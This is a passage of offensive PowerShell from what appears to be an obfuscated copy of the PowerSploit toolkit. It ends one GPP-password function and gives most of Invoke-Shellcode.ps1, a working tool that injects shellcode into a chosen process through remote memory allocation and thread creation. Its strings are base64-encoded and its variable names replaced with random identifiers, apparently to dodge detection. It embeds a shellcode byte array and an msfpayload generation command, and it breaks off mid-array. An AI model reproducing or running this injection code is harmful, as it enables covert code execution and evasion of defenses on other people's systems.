171 | ${bb5b513521294a3aaa8d8c72789a026e} = (Get-GppInnerFields ${b1372a912a6c4da5b57ac2089f6eb19b}.Fullname) 172 | echo ${bb5b513521294a3aaa8d8c72789a026e} 173 | } 174 | } 175 | catch {Write-Error $Error[0]} 176 | } 177 | -------------------------------------------------------------------------------- /Invoke-Shellcode.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Shellcode 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. 
7 | 8 | PowerSploit Function: Invoke-Shellcode 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre 17 | 18 | PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk): 19 | 20 | msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- 21 | 22 | Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary. 23 | 24 | .PARAMETER ProcessID 25 | 26 | Process ID of the process you want to inject shellcode into. 27 | 28 | .PARAMETER Shellcode 29 | 30 | Specifies an optional shellcode passed in as a byte array 31 | 32 | .PARAMETER Force 33 | 34 | Injects shellcode without prompting for confirmation. By default, Invoke-Shellcode prompts for confirmation before performing any malicious act. 35 | 36 | .EXAMPLE 37 | 38 | C:\PS> Invoke-Shellcode -ProcessId 4274 39 | 40 | Description 41 | ----------- 42 | Inject shellcode into process ID 4274. 43 | 44 | .EXAMPLE 45 | 46 | C:\PS> Invoke-Shellcode 47 | 48 | Description 49 | ----------- 50 | Inject shellcode into the running instance of PowerShell. 51 | 52 | .EXAMPLE 53 | 54 | C:\PS> Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3) 55 | 56 | Description 57 | ----------- 58 | Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET) 59 | Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit! 
60 | #> 61 | [CmdletBinding( DefaultParameterSetName = 'RunLocal', SupportsShouldProcess = $True , ConfirmImpact = 'High')] Param ( 62 | [ValidateNotNullOrEmpty()] 63 | [UInt16] 64 | ${a1c827e2c0ed4a4889805491350137e2}, 65 | [Parameter( ParameterSetName = 'RunLocal' )] 66 | [ValidateNotNullOrEmpty()] 67 | [Byte[]] 68 | ${da05bf47d70e468cb6812c76cc705015}, 69 | [Switch] 70 | ${bab5df81ac5040dbbbb4c01205f3b8e4} = $False 71 | ) 72 | Set-StrictMode -Version 2.0 73 | if ( $PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAG8AYwBlAHMAcwBJAEQA')))] ) 74 | { 75 | ps -Id ${a1c827e2c0ed4a4889805491350137e2} -ErrorAction Stop | Out-Null 76 | } 77 | function Local:Get-DelegateType 78 | { 79 | Param 80 | ( 81 | [OutputType([Type])] 82 | [Parameter( Position = 0)] 83 | [Type[]] 84 | ${bb080aeaa9c14dd289ca1d3b20e4fda6} = (New-Object Type[](0)), 85 | [Parameter( Position = 1 )] 86 | [Type] 87 | ${da743f05712e4f02a41b906b7a9388d4} = [Void] 88 | ) 89 | ${71eb5891e394463096dc7fc8acf3fc73} = [AppDomain]::CurrentDomain 90 | ${39c43027fab24b0a875e3cc4784e463c} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGYAbABlAGMAdABlAGQARABlAGwAZQBnAGEAdABlAA==')))) 91 | ${37613de083794f43bc0264300304466e} = ${71eb5891e394463096dc7fc8acf3fc73}.DefineDynamicAssembly(${39c43027fab24b0a875e3cc4784e463c}, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) 92 | ${9a1e2f639f084282bca9ee6a3998e64d} = ${37613de083794f43bc0264300304466e}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAE0AZQBtAG8AcgB5AE0AbwBkAHUAbABlAA=='))), $false) 93 | ${84781afc1aa84b9f8e5fdf7b5b0069c1} = ${9a1e2f639f084282bca9ee6a3998e64d}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQB5AEQAZQBsAGUAZwBhAHQAZQBUAHkAcABlAA=='))), 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBsAGEAcwBzACwAIABQAHUAYgBsAGkAYwAsACAAUwBlAGEAbABlAGQALAAgAEEAbgBzAGkAQwBsAGEAcwBzACwAIABBAHUAdABvAEMAbABhAHMAcwA='))), [System.MulticastDelegate]) 94 | ${7679f70a96684b37801aad08b7b7d4ee} = ${84781afc1aa84b9f8e5fdf7b5b0069c1}.DefineConstructor($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBUAFMAcABlAGMAaQBhAGwATgBhAG0AZQAsACAASABpAGQAZQBCAHkAUwBpAGcALAAgAFAAdQBiAGwAaQBjAA=='))), [System.Reflection.CallingConventions]::Standard, ${bb080aeaa9c14dd289ca1d3b20e4fda6}) 95 | ${7679f70a96684b37801aad08b7b7d4ee}.SetImplementationFlags($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAA=')))) 96 | ${00f967a230144148a5ecd0548fad806b} = ${84781afc1aa84b9f8e5fdf7b5b0069c1}.DefineMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAbwBrAGUA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABOAGUAdwBTAGwAbwB0ACwAIABWAGkAcgB0AHUAYQBsAA=='))), ${da743f05712e4f02a41b906b7a9388d4}, ${bb080aeaa9c14dd289ca1d3b20e4fda6}) 97 | ${00f967a230144148a5ecd0548fad806b}.SetImplementationFlags($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAA=')))) 98 | echo ${84781afc1aa84b9f8e5fdf7b5b0069c1}.CreateType() 99 | } 100 | function Local:Get-ProcAddress 101 | { 102 | Param 103 | ( 104 | [OutputType([IntPtr])] 105 | [Parameter( Position = 0, Mandatory = $True )] 106 | [String] 107 | ${bd379c865c084d63926b29e274d13c57}, 108 | [Parameter( Position = 1, Mandatory = $True )] 109 | [String] 110 | ${bc83db2988b24a899decd06f5ce0dc17} 111 | ) 112 | ${a86fee8214b64e148362d3df44da8af8} = [AppDomain]::CurrentDomain.GetAssemblies() | 113 | ? 
{ $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBkAGwAbAA=')))) } 114 | ${4813ce3f11724d888b9117e371746ba0} = ${a86fee8214b64e148362d3df44da8af8}.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIALgBVAG4AcwBhAGYAZQBOAGEAdABpAHYAZQBNAGUAdABoAG8AZABzAA==')))) 115 | ${7c4b9679d1684198b7ce9140b9f0bd99} = ${4813ce3f11724d888b9117e371746ba0}.GetMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUA')))) 116 | ${e3ff860698774c5e9d02353020ef9981} = ${4813ce3f11724d888b9117e371746ba0}.GetMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzAA==')))) 117 | ${d99b5df878d84ee3bc4365ce54168944} = ${7c4b9679d1684198b7ce9140b9f0bd99}.Invoke($null, @(${bd379c865c084d63926b29e274d13c57})) 118 | ${d97b10151d0445c58cd2ea9b89a144be} = New-Object IntPtr 119 | ${bd92edae7eb847bc959746f3df013e1a} = New-Object System.Runtime.InteropServices.HandleRef(${d97b10151d0445c58cd2ea9b89a144be}, ${d99b5df878d84ee3bc4365ce54168944}) 120 | echo ${e3ff860698774c5e9d02353020ef9981}.Invoke($null, @([System.Runtime.InteropServices.HandleRef]${bd92edae7eb847bc959746f3df013e1a}, ${bc83db2988b24a899decd06f5ce0dc17})) 121 | } 122 | function Local:Emit-CallThreadStub ([IntPtr] ${e3d140623c6145739659a574f66ba0df}, [IntPtr] ${ba243e174cbe490f95dbdf6afb87d6a5}, [Int] ${af758dacc80d4df9aee6c34c5e3ff606}) 123 | { 124 | ${a1ead47639d84c6abd3d3b5d395e5113} = ${af758dacc80d4df9aee6c34c5e3ff606} / 8 125 | function Local:ConvertTo-LittleEndian ([IntPtr] ${abe88355e36649e294f6146033fa00d2}) 126 | { 127 | ${cad64f9475e44f37aedc857432a529ea} = New-Object Byte[](0) 128 | ${abe88355e36649e294f6146033fa00d2}.ToString("X$(${a1ead47639d84c6abd3d3b5d395e5113}*2)") -split 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KABbAEEALQBGADAALQA5AF0AewAyAH0AKQA='))) | % { if ($_) { ${cad64f9475e44f37aedc857432a529ea} += [Byte] ($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAB4AHsAMAB9AA=='))) -f $_) } } 129 | [System.Array]::Reverse(${cad64f9475e44f37aedc857432a529ea}) 130 | echo ${cad64f9475e44f37aedc857432a529ea} 131 | } 132 | ${d83cbd9f2c8c4fd4b1096659282c3d02} = New-Object Byte[](0) 133 | if (${a1ead47639d84c6abd3d3b5d395e5113} -eq 8) 134 | { 135 | [Byte[]] ${d83cbd9f2c8c4fd4b1096659282c3d02} = 0x48,0xB8 136 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += ConvertTo-LittleEndian ${e3d140623c6145739659a574f66ba0df} 137 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0xFF,0xD0 138 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0x6A,0x00 139 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0x48,0xB8 140 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += ConvertTo-LittleEndian ${ba243e174cbe490f95dbdf6afb87d6a5} 141 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0xFF,0xD0 142 | } 143 | else 144 | { 145 | [Byte[]] ${d83cbd9f2c8c4fd4b1096659282c3d02} = 0xB8 146 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += ConvertTo-LittleEndian ${e3d140623c6145739659a574f66ba0df} 147 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0xFF,0xD0 148 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0x6A,0x00 149 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0xB8 150 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += ConvertTo-LittleEndian ${ba243e174cbe490f95dbdf6afb87d6a5} 151 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0xFF,0xD0 152 | } 153 | echo ${d83cbd9f2c8c4fd4b1096659282c3d02} 154 | } 155 | function Local:Inject-RemoteShellcode ([Int] ${a1c827e2c0ed4a4889805491350137e2}) 156 | { 157 | ${bbc927d3e9464169bdc8c8a1c5319604} = ${3ebe29a2fe6b4585ae05f269775ede9e}.Invoke(0x001F0FFF, $false, ${a1c827e2c0ed4a4889805491350137e2}) 158 | if (!${bbc927d3e9464169bdc8c8a1c5319604}) 159 | { 160 | Throw "Unable to open a process handle for PID: ${a1c827e2c0ed4a4889805491350137e2}" 161 | } 162 | 
${e96f52ccbbef4b70a8b15f725b641527} = $false 163 | if (${9c25a4ee2a114bf3b84fe7037b5b0ae3}) 164 | { 165 | ${8b1effb44a8745ef8806e93313dfd2c9}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}, [Ref] ${e96f52ccbbef4b70a8b15f725b641527}) | Out-Null 166 | if ((!${e96f52ccbbef4b70a8b15f725b641527}) -and ${a14e3c15a6454971b8418282b187db76}) 167 | { 168 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGUAbABsAGMAbwBkAGUAIABpAG4AagBlAGMAdABpAG8AbgAgAHQAYQByAGcAZQB0AGkAbgBnACAAYQAgADYANAAtAGIAaQB0ACAAcAByAG8AYwBlAHMAcwAgAGYAcgBvAG0AIAAzADIALQBiAGkAdAAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIABpAHMAIABuAG8AdAAgAHMAdQBwAHAAbwByAHQAZQBkAC4AIABVAHMAZQAgAHQAaABlACAANgA0AC0AYgBpAHQAIAB2AGUAcgBzAGkAbwBuACAAbwBmACAAUABvAHcAZQByAHMAaABlAGwAbAAgAGkAZgAgAHkAbwB1ACAAdwBhAG4AdAAgAHQAaABpAHMAIAB0AG8AIAB3AG8AcgBrAC4A'))) 169 | } 170 | elseif (${e96f52ccbbef4b70a8b15f725b641527}) 171 | { 172 | if ($Shellcode32.Length -eq 0) 173 | { 174 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAcwBoAGUAbABsAGMAbwBkAGUAIAB3AGEAcwAgAHAAbABhAGMAZQBkACAAaQBuACAAdABoAGUAIAAkAFMAaABlAGwAbABjAG8AZABlADMAMgAgAHYAYQByAGkAYQBiAGwAZQAhAA=='))) 175 | } 176 | ${da05bf47d70e468cb6812c76cc705015} = $Shellcode32 177 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAGoAZQBjAHQAaQBuAGcAIABpAG4AdABvACAAYQAgAFcAbwB3ADYANAAgAHAAcgBvAGMAZQBzAHMALgA='))) 178 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBzAGkAbgBnACAAMwAyAC0AYgBpAHQAIABzAGgAZQBsAGwAYwBvAGQAZQAuAA=='))) 179 | } 180 | else 181 | { 182 | if ($Shellcode64.Length -eq 0) 183 | { 184 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAcwBoAGUAbABsAGMAbwBkAGUAIAB3AGEAcwAgAHAAbABhAGMAZQBkACAAaQBuACAAdABoAGUAIAAkAFMAaABlAGwAbABjAG8AZABlADYANAAgAHYAYQByAGkAYQBiAGwAZQAhAA=='))) 185 | } 186 | ${da05bf47d70e468cb6812c76cc705015} = $Shellcode64 187 | Write-Verbose 
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBzAGkAbgBnACAANgA0AC0AYgBpAHQAIABzAGgAZQBsAGwAYwBvAGQAZQAuAA=='))) 188 | } 189 | } 190 | else 191 | { 192 | if ($Shellcode32.Length -eq 0) 193 | { 194 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAcwBoAGUAbABsAGMAbwBkAGUAIAB3AGEAcwAgAHAAbABhAGMAZQBkACAAaQBuACAAdABoAGUAIAAkAFMAaABlAGwAbABjAG8AZABlADMAMgAgAHYAYQByAGkAYQBiAGwAZQAhAA=='))) 195 | } 196 | ${da05bf47d70e468cb6812c76cc705015} = $Shellcode32 197 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBzAGkAbgBnACAAMwAyAC0AYgBpAHQAIABzAGgAZQBsAGwAYwBvAGQAZQAuAA=='))) 198 | } 199 | ${6bc2b18e42af49ad85011f1b677ce6cb} = ${8db0f45eca4f44feaf866f2cd42efd1b}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}, [IntPtr]::Zero, ${da05bf47d70e468cb6812c76cc705015}.Length + 1, 0x3000, 0x40) 200 | if (!${6bc2b18e42af49ad85011f1b677ce6cb}) 201 | { 202 | Throw "Unable to allocate shellcode memory in PID: ${a1c827e2c0ed4a4889805491350137e2}" 203 | } 204 | Write-Verbose "Shellcode memory reserved at 0x$(${6bc2b18e42af49ad85011f1b677ce6cb}.ToString("X$([IntPtr]::Size*2)"))" 205 | ${99cd331d99df48e8ae580253e8b17169}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}, ${6bc2b18e42af49ad85011f1b677ce6cb}, ${da05bf47d70e468cb6812c76cc705015}, ${da05bf47d70e468cb6812c76cc705015}.Length, [Ref] 0) | Out-Null 206 | ${ba243e174cbe490f95dbdf6afb87d6a5} = Get-ProcAddress kernel32.dll ExitThread 207 | if (${e96f52ccbbef4b70a8b15f725b641527}) 208 | { 209 | ${d83cbd9f2c8c4fd4b1096659282c3d02} = Emit-CallThreadStub ${6bc2b18e42af49ad85011f1b677ce6cb} ${ba243e174cbe490f95dbdf6afb87d6a5} 32 210 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBtAGkAdAB0AGkAbgBnACAAMwAyAC0AYgBpAHQAIABhAHMAcwBlAG0AYgBsAHkAIABjAGEAbABsACAAcwB0AHUAYgAuAA=='))) 211 | } 212 | else 213 | { 214 | ${d83cbd9f2c8c4fd4b1096659282c3d02} = Emit-CallThreadStub ${6bc2b18e42af49ad85011f1b677ce6cb} 
${ba243e174cbe490f95dbdf6afb87d6a5} 64 215 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBtAGkAdAB0AGkAbgBnACAANgA0AC0AYgBpAHQAIABhAHMAcwBlAG0AYgBsAHkAIABjAGEAbABsACAAcwB0AHUAYgAuAA=='))) 216 | } 217 | ${037523e80b9f4528980cfbd1bc5de1a2} = ${8db0f45eca4f44feaf866f2cd42efd1b}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}, [IntPtr]::Zero, ${d83cbd9f2c8c4fd4b1096659282c3d02}.Length, 0x3000, 0x40) 218 | if (!${037523e80b9f4528980cfbd1bc5de1a2}) 219 | { 220 | Throw "Unable to allocate thread call stub memory in PID: ${a1c827e2c0ed4a4889805491350137e2}" 221 | } 222 | Write-Verbose "Thread call stub memory reserved at 0x$(${037523e80b9f4528980cfbd1bc5de1a2}.ToString("X$([IntPtr]::Size*2)"))" 223 | ${99cd331d99df48e8ae580253e8b17169}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}, ${037523e80b9f4528980cfbd1bc5de1a2}, ${d83cbd9f2c8c4fd4b1096659282c3d02}, ${d83cbd9f2c8c4fd4b1096659282c3d02}.Length, [Ref] 0) | Out-Null 224 | ${9fe8c30bc755439cbb6abb5c2095c0f2} = ${9edf6540c07a449d85e95fc37d04768c}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}, [IntPtr]::Zero, 0, ${037523e80b9f4528980cfbd1bc5de1a2}, ${6bc2b18e42af49ad85011f1b677ce6cb}, 0, [IntPtr]::Zero) 225 | if (!${9fe8c30bc755439cbb6abb5c2095c0f2}) 226 | { 227 | Throw "Unable to launch remote thread in PID: ${a1c827e2c0ed4a4889805491350137e2}" 228 | } 229 | ${4d80fc465d0f4c81a9f0510ed4e4a630}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}) | Out-Null 230 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGUAbABsAGMAbwBkAGUAIABpAG4AagBlAGMAdABpAG8AbgAgAGMAbwBtAHAAbABlAHQAZQAhAA=='))) 231 | } 232 | function Local:Inject-LocalShellcode 233 | { 234 | if (${a14e3c15a6454971b8418282b187db76}) { 235 | if ($Shellcode32.Length -eq 0) 236 | { 237 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAcwBoAGUAbABsAGMAbwBkAGUAIAB3AGEAcwAgAHAAbABhAGMAZQBkACAAaQBuACAAdABoAGUAIAAkAFMAaABlAGwAbABjAG8AZABlADMAMgAgAHYAYQByAGkAYQBiAGwAZQAhAA=='))) 238 | 
return 239 | } 240 | ${da05bf47d70e468cb6812c76cc705015} = $Shellcode32 241 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBzAGkAbgBnACAAMwAyAC0AYgBpAHQAIABzAGgAZQBsAGwAYwBvAGQAZQAuAA=='))) 242 | } 243 | else 244 | { 245 | if ($Shellcode64.Length -eq 0) 246 | { 247 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAcwBoAGUAbABsAGMAbwBkAGUAIAB3AGEAcwAgAHAAbABhAGMAZQBkACAAaQBuACAAdABoAGUAIAAkAFMAaABlAGwAbABjAG8AZABlADYANAAgAHYAYQByAGkAYQBiAGwAZQAhAA=='))) 248 | return 249 | } 250 | ${da05bf47d70e468cb6812c76cc705015} = $Shellcode64 251 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBzAGkAbgBnACAANgA0AC0AYgBpAHQAIABzAGgAZQBsAGwAYwBvAGQAZQAuAA=='))) 252 | } 253 | ${b988be9001884bb6a7ea7d43e22fbecc} = ${eb933ced95a944428b16abca963b8087}.Invoke([IntPtr]::Zero, ${da05bf47d70e468cb6812c76cc705015}.Length + 1, 0x3000, 0x40) 254 | if (!${b988be9001884bb6a7ea7d43e22fbecc}) 255 | { 256 | Throw "Unable to allocate shellcode memory in PID: ${a1c827e2c0ed4a4889805491350137e2}" 257 | } 258 | Write-Verbose "Shellcode memory reserved at 0x$(${b988be9001884bb6a7ea7d43e22fbecc}.ToString("X$([IntPtr]::Size*2)"))" 259 | [System.Runtime.InteropServices.Marshal]::Copy(${da05bf47d70e468cb6812c76cc705015}, 0, ${b988be9001884bb6a7ea7d43e22fbecc}, ${da05bf47d70e468cb6812c76cc705015}.Length) 260 | ${ba243e174cbe490f95dbdf6afb87d6a5} = Get-ProcAddress kernel32.dll ExitThread 261 | if (${a14e3c15a6454971b8418282b187db76}) 262 | { 263 | ${d83cbd9f2c8c4fd4b1096659282c3d02} = Emit-CallThreadStub ${b988be9001884bb6a7ea7d43e22fbecc} ${ba243e174cbe490f95dbdf6afb87d6a5} 32 264 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBtAGkAdAB0AGkAbgBnACAAMwAyAC0AYgBpAHQAIABhAHMAcwBlAG0AYgBsAHkAIABjAGEAbABsACAAcwB0AHUAYgAuAA=='))) 265 | } 266 | else 267 | { 268 | ${d83cbd9f2c8c4fd4b1096659282c3d02} = Emit-CallThreadStub ${b988be9001884bb6a7ea7d43e22fbecc} 
${ba243e174cbe490f95dbdf6afb87d6a5} 64 269 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBtAGkAdAB0AGkAbgBnACAANgA0AC0AYgBpAHQAIABhAHMAcwBlAG0AYgBsAHkAIABjAGEAbABsACAAcwB0AHUAYgAuAA=='))) 270 | } 271 | ${d9667c5c1e8f43f8afda84bd01ba4a29} = ${eb933ced95a944428b16abca963b8087}.Invoke([IntPtr]::Zero, ${d83cbd9f2c8c4fd4b1096659282c3d02}.Length + 1, 0x3000, 0x40) 272 | if (!${d9667c5c1e8f43f8afda84bd01ba4a29}) 273 | { 274 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIAB0AGgAcgBlAGEAZAAgAGMAYQBsAGwAIABzAHQAdQBiAC4A'))) 275 | } 276 | Write-Verbose "Thread call stub memory reserved at 0x$(${d9667c5c1e8f43f8afda84bd01ba4a29}.ToString("X$([IntPtr]::Size*2)"))" 277 | [System.Runtime.InteropServices.Marshal]::Copy(${d83cbd9f2c8c4fd4b1096659282c3d02}, 0, ${d9667c5c1e8f43f8afda84bd01ba4a29}, ${d83cbd9f2c8c4fd4b1096659282c3d02}.Length) 278 | ${9fe8c30bc755439cbb6abb5c2095c0f2} = ${56bc5f168ce04046907a2bb4ffc2497f}.Invoke([IntPtr]::Zero, 0, ${d9667c5c1e8f43f8afda84bd01ba4a29}, ${b988be9001884bb6a7ea7d43e22fbecc}, 0, [IntPtr]::Zero) 279 | if (!${9fe8c30bc755439cbb6abb5c2095c0f2}) 280 | { 281 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABsAGEAdQBuAGMAaAAgAHQAaAByAGUAYQBkAC4A'))) 282 | } 283 | ${590b2e0764d34d65ba757e59bd6b00b4}.Invoke(${9fe8c30bc755439cbb6abb5c2095c0f2}, 0xFFFFFFFF) | Out-Null 284 | ${711707a94e3e4d0cb26eba626fed37bc}.Invoke(${d9667c5c1e8f43f8afda84bd01ba4a29}, ${d83cbd9f2c8c4fd4b1096659282c3d02}.Length + 1, 0x8000) | Out-Null 285 | ${711707a94e3e4d0cb26eba626fed37bc}.Invoke(${b988be9001884bb6a7ea7d43e22fbecc}, ${da05bf47d70e468cb6812c76cc705015}.Length + 1, 0x8000) | Out-Null 286 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGUAbABsAGMAbwBkAGUAIABpAG4AagBlAGMAdABpAG8AbgAgAGMAbwBtAHAAbABlAHQAZQAhAA=='))) 287 | } 288 | ${ad094e774331414aa822a80ef498872c} = 
Get-ProcAddress kernel32.dll IsWow64Process 289 | ${4c47f327f7344dbba8ad92d5e80a8255} = $null 290 | try { 291 | ${4c47f327f7344dbba8ad92d5e80a8255} = @(gwmi -Query $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBFAEwARQBDAFQAIABBAGQAZAByAGUAcwBzAFcAaQBkAHQAaAAgAEYAUgBPAE0AIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgA='))))[0] | select -ExpandProperty AddressWidth 292 | } catch { 293 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABkAGUAdABlAHIAbQBpAG4AZQAgAE8AUwAgAHAAcgBvAGMAZQBzAHMAbwByACAAYQBkAGQAcgBlAHMAcwAgAHcAaQBkAHQAaAAuAA=='))) 294 | } 295 | switch (${4c47f327f7344dbba8ad92d5e80a8255}) { 296 | '32' { 297 | ${9c25a4ee2a114bf3b84fe7037b5b0ae3} = $False 298 | } 299 | '64' { 300 | ${9c25a4ee2a114bf3b84fe7037b5b0ae3} = $True 301 | ${f799f54c46b24705bc8fbe41d173eb3d} = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool]) 302 | ${8b1effb44a8745ef8806e93313dfd2c9} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${ad094e774331414aa822a80ef498872c}, ${f799f54c46b24705bc8fbe41d173eb3d}) 303 | } 304 | default { 305 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAE8AUwAgAGEAZABkAHIAZQBzAHMAIAB3AGkAZAB0AGgAIABkAGUAdABlAGMAdABlAGQALgA='))) 306 | } 307 | } 308 | if ([IntPtr]::Size -eq 4) 309 | { 310 | ${a14e3c15a6454971b8418282b187db76} = $true 311 | } 312 | else 313 | { 314 | ${a14e3c15a6454971b8418282b187db76} = $false 315 | } 316 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGUAbABsAGMAbwBkAGUA')))]) 317 | { 318 | [Byte[]] $Shellcode32 = ${da05bf47d70e468cb6812c76cc705015} 319 | [Byte[]] $Shellcode64 = $Shellcode32 320 | } 321 | else 322 | { 323 | [Byte[]] $Shellcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b, 324 | 0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0, 325 | 
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57, 326 | 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01, 327 | 0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b, 328 | 0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4, 329 | 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 330 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24, 331 | 0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d, 332 | 0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5, 333 | 0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a, 334 | 0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63, 335 | 0x61,0x6c,0x63,0x00) 336 | [Byte[]] $Shellcode64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51, 337 | 